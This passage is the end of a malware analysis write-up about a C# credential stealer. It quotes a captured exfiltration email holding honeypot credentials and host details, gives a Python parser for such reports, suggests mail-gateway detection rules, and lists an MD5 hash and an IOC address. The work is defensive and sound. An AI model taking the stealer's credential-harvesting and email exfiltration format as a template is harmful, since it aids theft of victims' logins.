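    "Time: 07/28/2020 20:45:57\r\n"
    "User Name: admin\r\n"
    "Computer Name: U=\r\n"
    "SER-PC\r\n"
    "OSFullName: Microsoft Windows 7 Professional\r\n"
    "CPU: I=\r\n"
    "ntel(R) Core(TM) i5-6400 CPU @ 2.70GHz\r\n"
    "RAM: 3583.61 MB\r\n"
    "<hr>=0D=0AURL:192.168.1.1=0D=0AUsername:honey@pot.com=0D=0APassword=\r\n"
    ":honeypass356=0D=0AApplication:Outlook=0D=0A<hr>=0D=0AURL=\r\n"
    ":https://m.facebook.com/=0D=0AUsername:honey@pot.com=0D=0A=\r\n"
    "Password:honeypass356=0D=0AApplication:Chrome=0D=0A<hr>=0D=0A=\r\n"
    "URL:https://m.facebook.com=0D=0AUsername:honey@pot.com=0D=0A=\r\n"
    "Password:honeypass356=0D=0AApplication:Firefox=0D=0A<hr>=0D=0A\r\n"
)

_HOST_LINE = re.compile(r"^([^:\n]+?):\s*(.+?)\s*$", re.M)
_CRED_LINE = re.compile(r"^(URL|Username|Password|Application):(.*?)\s*$", re.M)


def parse_exfil(raw_message):
    """Return the operator mailbox, the victim tag from the Subject, the
    host-info block and the list of credential records."""
    msg = email.message_from_string(raw_message)
    # decode=True applies the Content-Transfer-Encoding, i.e. undoes the
    # quoted-printable soft breaks and turns =0D=0A back into CRLF.
    body = msg.get_payload(decode=True).decode("ascii", "replace")
    body = body.replace("\r\n", "\n")
    head, *records = body.split("<hr>")
    host = dict(_HOST_LINE.findall(head))
    creds = []
    for rec in records:
        fields = dict(_CRED_LINE.findall(rec))
        if fields:  # the text after the final <hr> is empty
            creds.append(fields)
    return {
        "mailbox": msg["From"],
        "subject": msg["Subject"],
        "host": host,
        "credentials": creds,
    }


if __name__ == "__main__":
    report = parse_exfil(SAMPLE_MESSAGE)
    print(report["subject"], "->", report["mailbox"])
    for c in report["credentials"]:
        print(c["Application"], c["URL"], c["Username"])
```

The Subject (PW_<user>/<host>) and the fact that From and To are the same address are the cheapest pivots here: a mail-gateway rule on that subject shape, or on authenticated SMTP from a workstation to an external mailbox, catches this family without any payload decoding.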

Some other functionality still needs detailed analysis; it feels like hooking would be needed to analyse it properly....

MD5: 1A25E75693B99AD09E55AEA29C6F2775
IOC:
89.201.175.36


Please credit the source when reposting. Checking the sources cited in the article is welcome, as is pointing out anything wrong or unclear.

Title: Execution analysis of a C# sample that reads its payload from a resource file

Author: 九世

Published: 2021-04-14, 08:27:03

Last updated: 2021-04-14, 08:44:35

Original link: http://422926799.github.io/posts/a98e0b02.html

License: "Attribution-NonCommercial-ShareAlike 4.0"; keep the original link and author when reposting.
